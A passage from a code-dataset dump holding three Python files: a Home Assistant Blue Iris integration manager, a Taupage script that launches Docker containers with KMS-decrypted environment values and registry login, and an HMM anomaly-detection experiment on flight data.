StorageManager:\n return self._storage_manager\n\n @property\n def config_data(self) -> Optional[ConfigData]:\n if self._config_manager is not None:\n return self._config_manager.data\n\n return None\n\n async def async_init(self, entry: ConfigEntry):\n try:\n self._storage_manager = StorageManager(self._hass)\n\n await self._config_manager.update(entry)\n\n self._api = BlueIrisApi(self._hass, self._config_manager)\n self._entity_manager = EntityManager(self._hass, self)\n self._device_manager = DeviceManager(self._hass, self)\n self._config_generator = AdvancedConfigurationGenerator(self._hass, self)\n\n self._entity_registry = async_get(self._hass)\n\n self._hass.loop.create_task(self._async_init())\n except InvalidToken:\n error_message = \"Encryption key got corrupted, please remove the integration and re-add it\"\n\n _LOGGER.error(error_message)\n\n data = await self._storage_manager.async_load_from_store()\n data.key = None\n await self._storage_manager.async_save_to_store(data)\n\n await self._hass.services.async_call(\n \"persistent_notification\",\n \"create\",\n {\"title\": DEFAULT_NAME, \"message\": error_message},\n )\n\n except Exception as ex:\n exc_type, exc_obj, tb = sys.exc_info()\n line_number = tb.tb_lineno\n\n _LOGGER.error(f\"Failed to async_init, error: {ex}, line: {line_number}\")\n\n async def _async_init(self):\n load = self._hass.config_entries.async_forward_entry_setup\n\n for domain in SIGNALS:\n await load(self._config_manager.config_entry, domain)\n\n self._is_initialized = True\n\n await self.async_update_entry()\n\n async def _update_entities(self, now):\n self._hass.async_create_task(self.async_update(now))\n\n async def async_update_entry(self, entry: ConfigEntry = None):\n update_config_manager = entry is not None\n\n if not update_config_manager:\n entry = self._config_manager.config_entry\n\n self._remove_async_track_time = async_track_time_interval(\n self._hass, self._update_entities, SCAN_INTERVAL\n )\n\n if not self._is_initialized:\n _LOGGER.info(\n f\"NOT INITIALIZED - Failed handling ConfigEntry change: {entry.as_dict()}\"\n )\n return\n\n _LOGGER.info(f\"Handling ConfigEntry change: {entry.as_dict()}\")\n\n if update_config_manager:\n await self._config_manager.update(entry)\n\n await self._api.initialize()\n\n await self.async_update(datetime.now())\n\n data = await self.storage_manager.async_load_from_store()\n integration_data = data.integrations.get(entry.title)\n\n if update_config_manager and integration_data is not None:\n if integration_data.generate_configuration_files:\n async_call_later(self._hass, 5, self.generate_config_files)\n\n integration_data.generate_configuration_files = False\n\n await self.storage_manager.async_save_to_store(data)\n\n async def async_remove(self, entry: ConfigEntry):\n _LOGGER.info(f\"Removing current integration - {entry.title}\")\n\n if self._remove_async_track_time is not None:\n self._remove_async_track_time()\n self._remove_async_track_time = None\n\n unload = self._hass.config_entries.async_forward_entry_unload\n\n for domain in SUPPORTED_DOMAINS:\n await unload(entry, domain)\n\n await self._device_manager.async_remove()\n\n _LOGGER.info(f\"Current integration ({entry.title}) removed\")\n\n async def async_update(self, event_time):\n if not self._is_initialized:\n _LOGGER.info(f\"NOT INITIALIZED - Failed updating @{event_time}\")\n return\n\n try:\n if self._is_updating:\n _LOGGER.debug(f\"Skip updating @{event_time}\")\n return\n\n _LOGGER.debug(f\"Updating @{event_time}\")\n\n self._is_updating = True\n\n await self._api.async_update()\n\n self.device_manager.update()\n self.entity_manager.update()\n\n await self.dispatch_all()\n except Exception as ex:\n exc_type, exc_obj, tb = sys.exc_info()\n line_number = tb.tb_lineno\n _LOGGER.error(f\"Failed to async_update, Error: {ex}, Line: {line_number}\")\n\n self._is_updating = False\n\n async def delete_entity(self, domain, name):\n try:\n entity = self.entity_manager.get_entity(domain, name)\n device_name = entity.device_name\n unique_id = entity.unique_id\n\n self.entity_manager.delete_entity(domain, name)\n\n device_in_use = self.entity_manager.is_device_name_in_use(device_name)\n\n entity_id = self.entity_registry.async_get_entity_id(\n domain, DOMAIN, unique_id\n )\n self.entity_registry.async_remove(entity_id)\n\n if not device_in_use:\n await self.device_manager.delete_device(device_name)\n except Exception as ex:\n exc_type, exc_obj, tb = sys.exc_info()\n line_number = tb.tb_lineno\n\n _LOGGER.error(f\"Failed to delete_entity, Error: {ex}, Line: {line_number}\")\n\n async def dispatch_all(self):\n if not self._is_initialized:\n _LOGGER.info(\"NOT INITIALIZED - Failed discovering components\")\n return\n\n for domain in SUPPORTED_DOMAINS:\n signal = SIGNALS.get(domain)\n\n async_dispatcher_send(self._hass, signal)\n\n def generate_config_files(self, now):\n self._config_generator.generate()\n", "repo_name": "elad-bar/ha-blueiris", "sub_path": "custom_components/blueiris/managers/home_assistant.py", "file_name": "home_assistant.py", "file_ext": "py", "file_size_in_byte": 8000, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 154, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 33, "usage_type": "name"}, {"api_name": "password_manager.PasswordManager", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "name"}, {"api_name": "helpers.advanced_configurations_generator.AdvancedConfigurationGenerator", "line_number": 47, "usage_type": "name"}, {"api_name": "configuration_manager.ConfigManager", "line_number": 49, "usage_type": "call"}, {"api_name": "api.blue_iris_api.BlueIrisApi", "line_number": 52, "usage_type": "name"}, {"api_name": "entity_manager.EntityManager", "line_number": 56, "usage_type": "name"}, {"api_name": "device_manager.DeviceManager", "line_number": 60, "usage_type": "name"}, {"api_name": "homeassistant.helpers.entity_registry.EntityRegistry", "line_number": 64, "usage_type": "name"}, {"api_name": "configuration_manager.ConfigManager", "line_number": 68, "usage_type": "name"}, {"api_name": "storage_manager.StorageManager", "line_number": 72, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 76, "usage_type": "name"}, {"api_name": "models.config_data.ConfigData", "line_number": 76, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 82, "usage_type": "name"}, {"api_name": "storage_manager.StorageManager", "line_number": 84, "usage_type": "call"}, {"api_name": "api.blue_iris_api.BlueIrisApi", "line_number": 88, "usage_type": "call"}, {"api_name": "entity_manager.EntityManager", "line_number": 89, "usage_type": "call"}, {"api_name": "device_manager.DeviceManager", "line_number": 90, "usage_type": "call"}, {"api_name": "helpers.advanced_configurations_generator.AdvancedConfigurationGenerator", "line_number": 91, "usage_type": "call"}, {"api_name": "homeassistant.helpers.entity_registry.async_get", "line_number": 93, "usage_type": "call"}, {"api_name": "cryptography.fernet.InvalidToken", "line_number": 96, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 112, "usage_type": "call"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 130, "usage_type": "name"}, {"api_name": "homeassistant.helpers.event.async_track_time_interval", "line_number": 136, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 153, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 153, "usage_type": "name"}, {"api_name": "homeassistant.helpers.event.async_call_later", "line_number": 160, "usage_type": "call"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 166, "usage_type": "name"}, {"api_name": "sys.exc_info", "line_number": 203, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 227, "usage_type": "call"}, {"api_name": "homeassistant.helpers.dispatcher.async_dispatcher_send", "line_number": 240, "usage_type": "call"}]} +{"seq_id": "40258428401", "text": "#!/usr/bin/env python3\n'''\nDocker runtime script: load /etc/taupage.yaml and run the Docker container\n'''\n\nimport argparse\nimport base64\nimport boto.kms\nimport boto.utils\nimport json\nimport logging\nimport os\nimport pierone.api\nimport pwd\nimport requests\nimport sys\nimport subprocess\nimport time\nimport yaml\n\nfrom taupage import is_sensitive_key, CREDENTIALS_DIR\n\nAWS_KMS_PREFIX = 'aws:kms:'\n\n\ndef get_region():\n identity = boto.utils.get_instance_identity()['document']\n return identity['region']\n\n\ndef decrypt(val):\n '''\n >>> decrypt(True)\n True\n\n >>> decrypt('test')\n 'test'\n '''\n if str(val).startswith(AWS_KMS_PREFIX):\n ciphertext_blob = val[len(AWS_KMS_PREFIX):]\n ciphertext_blob = base64.b64decode(ciphertext_blob)\n conn = boto.kms.connect_to_region(get_region())\n try:\n # HACK: ugly hack to fix boto Python 3 compat\n # \"decrypt\" expects bytes, but \"json.dumps\" uses bytes, too\n # which throws \"TypeError: .. is not JSON serializable\"\n # workaround: return Base64 as unicode string\n orig = base64.b64encode\n base64.b64encode = lambda x: orig(x).decode('ascii')\n data = conn.decrypt(ciphertext_blob)\n if 'Plaintext' not in data:\n raise Exception('KMS decrypt failed')\n finally:\n base64.b64encode = orig\n return data['Plaintext'].decode('utf-8')\n else:\n return val\n\n\ndef mask_command(cmd: list):\n '''\n >>> mask_command([])\n ''\n\n >>> mask_command(['-e', 'SECRET=abc'])\n '-e SECRET=MASKED'\n '''\n masked_cmd = []\n for arg in cmd:\n key, sep, val = arg.partition('=')\n if is_sensitive_key(key):\n val = 'MASKED'\n masked_cmd.append(key + sep + val)\n return ' '.join(masked_cmd)\n\n\ndef get_or(d: dict, key, default):\n '''\n Return value from dict if it evaluates to true or default otherwise\n\n This is a convenience function to treat \"null\" values in YAML config\n the same as an empty dictionary or list.\n\n >>> get_or({}, 'a', 'b')\n 'b'\n\n >>> get_or({'a': None}, 'a', 'b')\n 'b'\n\n >>> get_or({'a': 1}, 'a', 'b')\n 1\n '''\n return d.get(key) or default\n\n\ndef get_env_options(config: dict):\n '''build Docker environment options'''\n for key, val in get_or(config, 'environment', {}).items():\n yield '-e'\n yield '{}={}'.format(key, decrypt(val))\n\n if config.get('etcd_discovery_domain'):\n # TODO: use dynamic IP of docker0\n yield '-e'\n yield 'ETCD_URL=http://172.17.42.1:2379'\n\n # set APPLICATION_ID and APPLICATION_VERSION for convenience\n # NOTE: we should not add other environment variables here (even if it sounds tempting),\n # esp. EC2 metadata should not be passed as env. variables!\n for key in ('application_id', 'application_version'):\n yield '-e'\n yield '{}={}'.format(key.upper(), config.get(key))\n\n\ndef get_volume_options(config: dict):\n '''build Docker volume mount options'''\n for path, mount in get_or(config, 'mounts', {}).items():\n yield '-v'\n # /opt/taupage/init.d/10-prepare-disks.py will mount the path below \"/mounts\" on the host system\n yield '{}:{}'.format('/mounts{}'.format(path), path)\n\n # meta directory, e.g. containing application credentials retrieved by berry\n yield '-v'\n yield '/meta:/meta'\n yield '-e'\n yield 'CREDENTIALS_DIR={}'.format(CREDENTIALS_DIR)\n\n\ndef get_port_options(config: dict):\n for host_port, container_port in get_or(config, 'ports', {}).items():\n yield '-p'\n yield '{}:{}'.format(host_port, container_port)\n\n\ndef get_other_options(config: dict):\n if not config.get('root'):\n # Docker only accepts UNIX user IDs (not names)\n entry = pwd.getpwnam('application')\n yield '-u'\n yield str(entry.pw_uid)\n\n for t in 'add', 'drop':\n for cap in get_or(config, 'capabilities_{}'.format(t), []):\n yield '--cap-{}={}'.format(t, cap)\n\n if config.get('hostname'):\n yield '--hostname={}'.format(config.get('hostname'))\n\n if config.get('networking'):\n yield '--net={}'.format(config.get('networking'))\n\n if config.get('privileged'):\n yield '--privileged'\n\n\ndef extract_registry(docker_image: str) -> str:\n \"\"\"\n >>> extract_registry('nginx')\n\n >>> extract_registry('foo.bar.example.com:2195/namespace/my_repo:1.0')\n 'foo.bar.example.com:2195'\n \"\"\"\n\n parts = docker_image.split('/')\n if len(parts) == 3:\n return parts[0]\n return None\n\n\ndef registry_login(config: dict, registry: str):\n if 'pierone' not in registry:\n logging.warning('Docker registry seems not to be Pier One, skipping OAuth login')\n return\n pierone_url = 'https://{}'.format(registry)\n token_url = config.get('token_service_url')\n\n if not token_url:\n logging.warning('No token service URL configured in Taupage YAML (\"token_service_url\" property)')\n return\n\n path = os.path.join(CREDENTIALS_DIR, 'user.json')\n\n while not os.path.exists(path):\n logging.info('Waiting for berry to download OAuth credentials to {}..'.format(path))\n time.sleep(5)\n\n with open(path) as fd:\n credentials = json.load(fd)\n\n user = credentials.get('application_username')\n passwd = credentials.get('application_password')\n\n if not user or not passwd:\n logging.warning('Invalid OAuth credentials: application user and/or password missing in %s', path)\n return\n\n pierone.api.docker_login(pierone_url, 'services', 'pierone', user, passwd, token_url=token_url, use_keyring=False)\n\n\ndef run_docker(cmd, dry_run):\n logging.info('Starting Docker container: {}'.format(mask_command(cmd)))\n if not args.dry_run:\n max_tries = 3\n for i in range(max_tries):\n try:\n out = subprocess.check_output(cmd)\n break\n except Exception as e:\n if i+1 < max_tries:\n logging.info('Docker run failed (try {}/{}), retrying in 5s..'.format(i+1, max_tries))\n time.sleep(5)\n else:\n raise e\n container_id = out.decode('utf-8').strip()\n logging.info('Container {} is running'.format(container_id))\n\n\ndef get_first(iterable, default=None):\n if iterable:\n for item in iterable:\n return item\n return default\n\n\ndef wait_for_health_check(config: dict):\n health_check_port = config.get('health_check_port', get_first(sorted(get_or(config, 'ports', {}).keys())))\n health_check_path = config.get('health_check_path')\n health_check_timeout_seconds = get_or(config, 'health_check_timeout_seconds', 60)\n\n if not health_check_path:\n logging.info('Health check path is not configured, not waiting for health check')\n return\n if not health_check_port:\n logging.warning('Health check port is not configured, skipping health check')\n return\n\n url = 'http://localhost:{}{}'.format(health_check_port, health_check_path)\n\n start = time.time()\n while time.time() < start + health_check_timeout_seconds:\n logging.info('Waiting for health check {}:{}..'.format(health_check_port, health_check_path))\n try:\n response = requests.get(url, timeout=5)\n if response.status_code == 200:\n logging.info('Health check returned OK')\n return\n except:\n pass\n\n time.sleep(2)\n\n logging.error('Timeout of {}s expired for health check {}:{}'.format(\n health_check_timeout_seconds, health_check_port, health_check_path))\n sys.exit(2)\n\n\ndef main(args):\n\n with open(args.config) as fd:\n config = yaml.safe_load(fd)\n\n source = config['source']\n\n registry = extract_registry(source)\n\n if registry:\n registry_login(config, registry)\n\n cmd = ['docker', 'run', '-d', '--log-driver=syslog', '--restart=on-failure:10']\n for f in get_env_options, get_volume_options, get_port_options, get_other_options:\n cmd += list(f(config))\n cmd += [source]\n\n try:\n run_docker(cmd, args.dry_run)\n except Exception as e:\n logging.error('Docker run failed: %s', mask_command(str(e).split(' ')))\n sys.exit(1)\n\n wait_for_health_check(config)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--config', '-c', help='Config file', default='/etc/taupage.yaml')\n parser.add_argument('--dry-run', help='Print what would be done', action='store_true')\n args = parser.parse_args()\n logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')\n logging.getLogger(\"urllib3.connectionpool\").setLevel(logging.WARN)\n main(args)\n", "repo_name": "elgalu/taupage", "sub_path": "runtime/opt/taupage/runtime/Docker.py", "file_name": "Docker.py", "file_ext": "py", "file_size_in_byte": 8813, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "boto.kms.utils.get_instance_identity", "line_number": 27, "usage_type": "call"}, {"api_name": "boto.kms.utils", "line_number": 27, "usage_type": "attribute"}, {"api_name": "boto.kms", "line_number": 27, "usage_type": "name"}, {"api_name": "base64.b64decode", "line_number": 41, "usage_type": "call"}, {"api_name": "boto.kms.kms.connect_to_region", "line_number": 42, "usage_type": "call"}, {"api_name": "boto.kms.kms", "line_number": 42, "usage_type": "attribute"}, {"api_name": "boto.kms", "line_number": 42, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 48, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 49, "usage_type": "attribute"}, {"api_name": "base64.b64encode", "line_number": 54, "usage_type": "attribute"}, {"api_name": "taupage.is_sensitive_key", "line_number": 71, "usage_type": "call"}, {"api_name": "taupage.CREDENTIALS_DIR", "line_number": 126, "usage_type": "argument"}, {"api_name": "pwd.getpwnam", "line_number": 138, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 172, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 181, "usage_type": "call"}, {"api_name": "taupage.CREDENTIALS_DIR", "line_number": 181, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 183, "usage_type": "call"}, {"api_name": "os.path", "line_number": 183, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 184, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 185, "usage_type": "call"}, {"api_name": "json.load", "line_number": 188, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 194, "usage_type": "call"}, {"api_name": "pierone.api.api.docker_login", "line_number": 197, "usage_type": "call"}, {"api_name": "pierone.api.api", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pierone.api", "line_number": 197, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 201, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 206, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 210, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 211, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 215, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 231, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 234, "usage_type": "call"}, {"api_name": "time.time", "line_number": 239, "usage_type": "call"}, {"api_name": "time.time", "line_number": 240, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 241, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 243, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 245, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 250, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 252, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 254, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 260, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 277, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 278, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 284, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 288, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 288, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 289, "usage_type": "call"}, {"api_name": "logging.WARN", "line_number": 289, "usage_type": "attribute"}]} +{"seq_id": "19929554927", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nHMM voli aerei\n \n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats, linalg, integrate\nfrom hmmlearn import hmm\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import roc_curve\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# COV_DATA: set of the probability distributions over observations in each state\n# hellinger_dist: 1/2 * integral(sqrt (f(x)) - sqrt (g(x)) dx) \ndef hellinger_dist(mu_model, cov_model, mu_data, cov_data):\n num_comp1 = (linalg.det(cov_model)**(1/4))*(linalg.det(cov_data)**(1/4))\n den_comp1 = (linalg.det((cov_model + cov_data)/2)**(1/2))\n comp1 = num_comp1/den_comp1\n comp2 = float(np.exp((-1/8) * (mu_model - mu_data) @ np.linalg.matrix_power((cov_model+cov_data)/2, -1) @ (mu_model - mu_data).T))\n return 1 - comp1 * comp2\n\n\n# viene calcolato uno score ad ogni sliding window\n# quando supera la threshold è una anomalia\n\n# Viterbi training\ndef evaluate(model, data, w):\n i = w\n scores = []\n while(i <= data.shape[0]): \n # finestra all'istante t-esimo della ts data[0:t]->data[1:t+1]->data[2:t+2]\n Wt = data[i-w:i].copy()\n \n # utilizza l'algoritmo di Viterbi per trovare il Viterbi path (la sequenza di stati più probabile) basandosi sul modello corrente\n # ll: log probabilità della sequenza di stati prodotta\n # St: sequenza di stati prodotta (stessa lunghezza di Wt)\n ll, St = model.decode(Wt)\n \n # ritorna un array contenente i valori più comuni nell'array passato come parametro\n st = stats.mode(St)[0]\n \n # t through maximum likelihood with the data inside the window\n X = Wt[St == st]\n\n mu = np.reshape(np.mean(X, axis=0), [1, data.shape[1]])\n cov = (np.diag(np.cov(X.T)) + 1e-5) * np.eye(data.shape[1], data.shape[1])\n \n # calcolo con hellinger_dist lo score \n # the Hellinger distance is computed between Norm(µ, Sigma) and the emission probability of state s^t in lambda^N\n score = hellinger_dist(model.means_[st], model.covars_[st][0], mu, cov)\n \n scores.append(score)\n i += 1\n \n return scores\n\n\ndef bic_fun(funz_likelihood, params, data):\n \"\"\"\n Calcola la metrica per la scelta del modello all'interno di una classe di modelli\n \n -2 ln(L) + p*ln(len(data))\n \n - L è il valore max della funzione di likelihood ottenuta da model(HMM).score\n - p numero di parametri del modello HMM (Sezione: Structural architecture) https://en.wikipedia.org/wiki/Hidden_Markov_model \n \"\"\"\n \n bic = -2*funz_likelihood(data) + params*np.log(len(data))\n return bic\n\n\ndef chose_best_model(data, n_states_max=10):\n min_bic = float(\"inf\")\n n_states = 0\n best_hmm = None\n \n print(\"Identintifico il miglior modello...\")\n for N in range(1,n_states_max+1):\n\n print(\"Iterazione:\", N, end=\", \")\n \n hmm_candidate = hmm.GaussianHMM(n_components=N, covariance_type='diag', n_iter=100, random_state=0)\n hmm_candidate.fit(data)\n\n # Calcolo il numero parametri di HMM\n # - probabilità di transizione N*(N-1)\n # - distribuzione multivariata quindi MEDIE + MATRICE COVARIANZA = (N*M(M+3))/2\n #\n #(Sezione: Structural architecture) https://en.wikipedia.org/wiki/Hidden_Markov_model \n \n # n_features: Dimensionality of the Gaussian emissions.\n M = hmm_candidate.n_features\n\n #parameters = N*(N-1) + (N*M*(M+3))/2\n parameters = M + M^2 + N*M + N*M\n\n bic = bic_fun(hmm_candidate.score, parameters, data)\n \n if bic < min_bic:\n min_bic = bic\n best_hmm = hmm_candidate\n n_states = N\n\n\n print(\"miglior modello:\", n_states, \", valore bic=\", min_bic)\n\n return (best_hmm, n_states)\n\n\n################# MAIN\npath_train = './datasets/dataset_voli/187093582_train_set.csv'\npath_test = './datasets/dataset_voli/187093582_test_set.csv'\n\ntrain = pd.read_csv(path_train).values\ntest = pd.read_csv(path_test).values\n\nY = test[:,3]\ntest = np.delete(test, np.s_[3], axis=1)\n\n################# RIDUZIONE DEL RUMORE\n# ho provato con rolling mean ma vengono risultati molto pessimi\n# anche con decomposizione si ottengono dei risultati poco accettabili nonostante\n# la migliore stagionalità sia 367\n'''\ntrain_normalized = []\nfor column in train.transpose():\n \n # decomposizione serie temporale\n ts_column = pd.Series(column)\n decomposition = seasonal_decompose(ts_column, model=\"additive\", period=736) #367\n \n residual_absent = decomposition.seasonal + decomposition.trend\n residual_absent.dropna(inplace=True) \n train_normalized.append(residual_absent)\n\ntrain = np.array(train_normalized).transpose() # 1 - roll mean sul train set\n'''\n\n################# SCELTA MIGLIOR MODELLO\n# fa già il fitting dei dati\n#best_hmm, n_states = chose_best_model(train, 30)\n#print(\"Il miglior modello è quello con\", n_states)\n#model = best_hmm\n\n#K = 20\nK = 30 # miglior modello secondo BIC\nmodel = hmm.GaussianHMM(n_components=K, covariance_type=\"diag\", n_iter=100, random_state=0)\n\nmodel.fit(train)\n\n# %% grandezza della finestra variabile\nw_ott = 0\nmax_AUC = 0\n\nfor w in range(0,101,2):\n try:\n anomaly_scores = evaluate(model, test, w)\n except:\n continue\n \n fpr, tpr, t = roc_curve(Y[(w-1):], anomaly_scores)\n AUC = integrate.trapz(tpr, fpr)\n print(\"Finestra =\", w, \"AUC =\", AUC)\n \n if AUC > max_AUC:\n w_ott = w\n max_AUC = AUC\n\n# %% curva ROC e statistiche al variare della threshold\n#w_ott = 96\nw = w_ott # finestra ottimale\nanomaly_scores = evaluate(model, test, w)\n\nplt.figure(dpi=125)\nplt.plot(np.arange(0,240), anomaly_scores[0:240])\nplt.fill_between(np.arange(0,240), Y[(w-1):240+(w-1)], color='red', alpha=0.5)\nplt.ylim(bottom = -0.05, top = 1.05)\nplt.title(\"Anomaly score (dataset voli) - {} stati e finestra = {}\".format(K,w))\nplt.xlabel(\"Observation\")\nplt.ylabel(\"Score\")\nplt.show()\n\n# test e anomaly_scores hanno medesima lunghezza dato che non sono state fatte operazioni\n# per ridurre il rumore\nprint(len(test))\nprint(len(anomaly_scores))\n\n# label che evidenziano se c'è una ANOMALIA oppure NO\nprint(len(Y))\n\nthresholds = [i for i in np.arange(0,1,0.05)]\nprecs, recs, f1s, accs, tprs, fprs = [], [], [], [], [], []\n\nfor thresh in thresholds:\n tp, fp, tn, fn = 0, 0, 0, 0\n \n for i in range(len(anomaly_scores)):\n s = anomaly_scores[i]\n if s > thresh: # valore anomalo?\n if Y[i+(w-1)] == True:\n tp += 1\n else:\n fp += 1\n if s < thresh: # valore nominale?\n if Y[i+(w-1)] == False: \n tn += 1\n else:\n fn += 1\n '''\n print('Precision:', tp/(tp+fp))\n print('Recall:', tp/(tp+fn))\n print('F1 score', tp / (tp + 1/2 * (fp+fn)))\n print('Accuracy', (tp+tn) / ((tp+fn)+(fp+tn)))\n print('TPR', tp / (tp+fn))\n print('FPR', fp / (fp+tn))\n '''\n prec = tp/(tp+fp)\n rec = tp/(tp+fn)\n f1 = tp / (tp + 1/2 * (fp+fn))\n acc = (tp+tn) / ((tp+fn)+(fp+tn))\n tpr = tp / (tp+fn)\n fpr = fp / (fp+tn)\n \n precs.append(prec)\n recs.append(rec)\n f1s.append(f1)\n accs.append(acc)\n tprs.append(tpr)\n fprs.append(fpr)\n\n# https://en.wikipedia.org/wiki/Precision_and_recall#Definition_(classification_context)\nplt.figure(dpi=125)\nplt.plot(thresholds, precs)\nplt.title(\"Grafico di precision (dataset voli)\")\nplt.xlabel(\"Threshold\")\nplt.ylabel(\"Precision\")\nplt.show()\n\nplt.figure(dpi=125)\nplt.plot(thresholds, recs)\nplt.title(\"Grafico di recall (dataset voli)\")\nplt.xlabel(\"Threshold\")\nplt.ylabel(\"Recall\")\nplt.show()\n\n# https://en.wikipedia.org/wiki/F-score#Definition\nplt.figure(dpi=125)\nplt.plot(thresholds, f1s)\nplt.title(\"Grafico di F1 score (dataset voli)\")\nplt.xlabel(\"Threshold\")\nplt.ylabel(\"F1 score\")\nplt.show()\n\n# https://it.wikipedia.org/wiki/Receiver_operating_characteristic\nplt.figure(dpi=125)\nplt.plot(thresholds, accs)\nplt.title(\"Grafico di accuracy (dataset voli)\")\nplt.xlabel(\"Threshold\")\nplt.ylabel(\"Accuracy\")\nplt.show()\n\nplt.figure(dpi=125)\nplt.plot(thresholds, tprs)\nplt.title(\"Grafico del True Positive Rate (dataset voli)\")\nplt.xlabel(\"Threshold\")\nplt.ylabel(\"TPR\")\nplt.show()\n\nplt.figure(dpi=125)\nplt.plot(thresholds, fprs)\nplt.title(\"Grafico del False Positive Rate (dataset voli)\")\nplt.xlabel(\"Threshold\")\nplt.ylabel(\"FPR\")\nplt.show()\n\n# https://scikit-learn.org/stable/modules/generated/sklearn.metrics.roc_curve.html\nfpr, tpr, t = roc_curve(Y[(w-1):], anomaly_scores)\nAUC = integrate.trapz(tpr, fpr)\n\nplt.figure(dpi=125)\nplt.plot(fpr, tpr)\nplt.title(\"Curva ROC (dataset voli) - AUC = {area:.4f}\".format(area=AUC))\nplt.xlabel(\"FPR\")\nplt.ylabel(\"TPR\")\nplt.show()\n\nprint(\"AUC (metodo integrazione trapezoidale):\", AUC)\n", "repo_name": "zampierida98/anomaly-detection", "sub_path": "hmm_hellinger_voli.py", "file_name": "hmm_hellinger_voli.py", "file_ext": "py", "file_size_in_byte": 8822, "program_lang": "python", "lang": "it", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 15, "usage_type": "call"}, {"api_name": "scipy.linalg.det", "line_number": 21, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 21, "usage_type": "name"}, {"api_name": "scipy.linalg.det", "line_number": 22, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linalg.matrix_power", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 24, "usage_type": "attribute"}, {"api_name": "scipy.stats.mode", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.reshape", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.cov", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.eye", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 73, "usage_type": "call"}, {"api_name": "hmmlearn.hmm.GaussianHMM", "line_number": 87, "usage_type": "call"}, {"api_name": "hmmlearn.hmm", "line_number": 87, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 119, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.s_", "line_number": 123, "usage_type": "attribute"}, {"api_name": "hmmlearn.hmm.GaussianHMM", "line_number": 152, "usage_type": "call"}, {"api_name": "hmmlearn.hmm", "line_number": 152, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 166, "usage_type": "call"}, {"api_name": "scipy.integrate.trapz", "line_number": 167, "usage_type": "call"}, {"api_name": "scipy.integrate", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.fill_between", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylim", 